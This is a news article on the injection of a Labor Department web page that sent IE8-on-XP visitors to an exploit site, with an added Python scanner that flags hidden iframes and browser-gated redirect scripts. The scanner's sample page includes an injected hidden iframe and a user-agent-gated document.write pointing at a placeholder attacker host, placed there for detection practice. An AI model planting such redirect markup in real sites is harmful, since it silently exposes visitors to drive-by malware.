Cyberattack highlights software update problem in large organizations

A recent cyberattack targeting U.S. government employees working with nuclear weapons illustrates the vulnerability of large organizations that struggle with deploying protective software upgrades.

The attackers, who compromised a Department of Labor website, exploited a previously unknown vulnerability, called a zero-day flaw, in Internet Explorer 8, commonly found on PCs running Windows XP. JavaScript injected into the site redirected visitors using IE8 on XP to a malicious website.

In choosing to go after federal agencies, the attackers understood that many government departments are still using outdated versions of Windows and IE, due to the huge expense of upgrading thousands of people to newer versions. Such migrations involve the difficult task of upgrading many other business applications to support the new OS.

"There's a lot of government agencies, and commercial entities as well, that simply cannot upgrade to these latest versions," Eddie Mitchell, security researcher for Invincea, said Monday. "They have internal applications, HR (human resource) applications, payroll applications and such that were designed explicitly to work with Internet Explorer 8, which is why these organizations are still vulnerable."

Researchers agree that the command-and-control (C&C) servers in the latest attack, discovered last week, have attributes similar to those used in previous assaults originating from China.

FireEye reported that the host name of the C&C servers in the latest attack included the phrase "microsoftUpdate," which was also used in attacks over the last six months against the Council on Foreign Relations website and news sites in China visited by Chinese dissidents.


"I'm not going to be surprised if they are originating from the same group," Zheng Bu, senior director of research for FireEye, said.

FireEye and Invincea have not identified the culprits, but AlienVault reported that the malware is using the same protocol to communicate with the C&C servers as the one used by a Chinese hacking group called Deep Panda. The group is known to attack a variety of U.S. entities, including the high-tech and defense industries and state and federal government agencies.

The pages compromised on the Labor Department site contained information that listed nuclear-related illnesses linked to Department of Energy facilities where employees are developing atomic weapons. Visitors were redirected to the malicious website unknowingly, since there was no obvious change in the browser.

That's accomplished through the use of JavaScript and HTML inline frames. Inline frames, called iframes, are embedded in a page to load content from another site; in this attack they loaded the malicious site without any visible change to the page. IFrames were the most commonly used exploit in Web-based attacks in the second half of last year, according to Microsoft's latest Security Intelligence Report.
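The redirection described above leaves traces in the compromised page's HTML that a site owner can scan for. The following Python script is an added example and is not part of the article or the work of the researchers quoted in it. It looks for the two injection patterns the story describes: iframes that are hidden (zero size or CSS-hidden) or that point off-site, and scripts that redirect or inject an iframe only when the visitor's user-agent matches IE8 on Windows XP. The site host `SITE_HOST` and the sample page `SAMPLE_PAGE` are constructed assumptions for the demonstration; the domains in it are placeholders.

```python
"""Scan HTML for hidden/off-site iframes and user-agent-gated redirect scripts.

Added example, stdlib only. SITE_HOST and SAMPLE_PAGE are constructed
assumptions, not values from the article.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "www.example.gov"  # assumed: host the scanned page legitimately belongs to
TINY = {"0", "1", "0px", "1px"}  # iframe dimensions that render nothing visible

# Heuristics for the script side: a user-agent check, tokens selecting IE8 on
# Windows XP (NT 5.1), and a redirect or a document.write that injects an iframe.
UA_CHECK = re.compile(r"navigator\.userAgent", re.I)
TARGET_TOKENS = re.compile(r"MSIE\s*8|Windows NT 5\.1", re.I)
REDIRECT = re.compile(
    r"(?:window\.|document\.)?location(?:\.href)?\s*=|location\.replace\(|"
    r"document\.write\([^)]*<iframe",
    re.I,
)


class InjectionCollector(HTMLParser):
    """Collects every <iframe> attribute set and every <script> body."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._script_buf = None  # non-None while inside a <script> element

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._script_buf = []

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            self.scripts.append("".join(self._script_buf))
            self._script_buf = None


def iframe_findings(attrs):
    """Return the reasons an iframe looks injected (empty list if it looks benign)."""
    reasons = []
    width = (attrs.get("width") or "").strip().lower()
    height = (attrs.get("height") or "").strip().lower()
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if width in TINY or height in TINY:
        reasons.append("tiny dimensions")
    if "display:none" in style or "visibility:hidden" in style:
        reasons.append("hidden by CSS")
    host = urlparse(attrs.get("src") or "").hostname
    if host and host.lower() != SITE_HOST:
        reasons.append(f"off-site src {host}")
    return reasons


def script_findings(source):
    """Return the reasons an inline script looks like a gated redirect."""
    reasons = []
    if UA_CHECK.search(source) and TARGET_TOKENS.search(source):
        reasons.append("user-agent gated on IE8/XP")
    if REDIRECT.search(source):
        reasons.append("redirect or iframe injection")
    return reasons


def scan(html):
    """Return a list of (kind, detail, reasons) for every suspicious element."""
    parser = InjectionCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for attrs in parser.iframes:
        reasons = iframe_findings(attrs)
        if reasons:
            findings.append(("iframe", attrs.get("src") or "", reasons))
    for script in parser.scripts:
        reasons = script_findings(script)
        if reasons:
            findings.append(("script", script.strip()[:60], reasons))
    return findings


# Constructed sample: one legitimate iframe, one hidden off-site iframe and one
# script that only acts for IE8 on Windows XP. Domains are placeholders.
SAMPLE_PAGE = """<html><body>
<h1>Occupational illness compensation</h1>
<iframe src="https://www.example.gov/widgets/help.html" width="300" height="200"></iframe>
<iframe src="http://evil.example.net/landing.html" width="0" height="0" style="display:none"></iframe>
<script>
var ua = navigator.userAgent;
if (ua.indexOf("MSIE 8.0") > -1 && ua.indexOf("Windows NT 5.1") > -1) {
  document.write('<iframe src="http://evil.example.net/ie8.html" width="1" height="1"></iframe>');
}
</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail, reasons in scan(SAMPLE_PAGE):
        print(f"{kind}: {detail!r} -> {', '.join(reasons)}")
```

Run it against a saved copy of a page (`scan(open(path).read())`) as part of routine integrity checks; the off-site rule is the one that catches the most, since an injected frame rarely points at the victim's own host, while the size and CSS rules catch frames that an attacker has tried to keep invisible.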

Makers of popular exploit kits available in the criminal underground, such as Blackhole and Cool, are expected to incorporate the latest zero-day vulnerability soon, Mitchell said.

"It would not surprise me in the least, based on what we've seen in the past, to see this exploit loaded [in kits] in the next day or two, a week at the most," he said.

Indeed, FireEye reported finding nine other websites besides the Labor Department's redirecting visitors to the same malicious site. Microsoft issued an alert last Friday notifying customers of the vulnerability. The company has not said when it would release a patch.

"We strongly encourage customers to follow the workarounds listed in the advisory while we continue working on a full update to address this issue," said Dustin Childs, group manager for response communications for Microsoft Trustworthy Computing.

Stories by Antone Gonsalves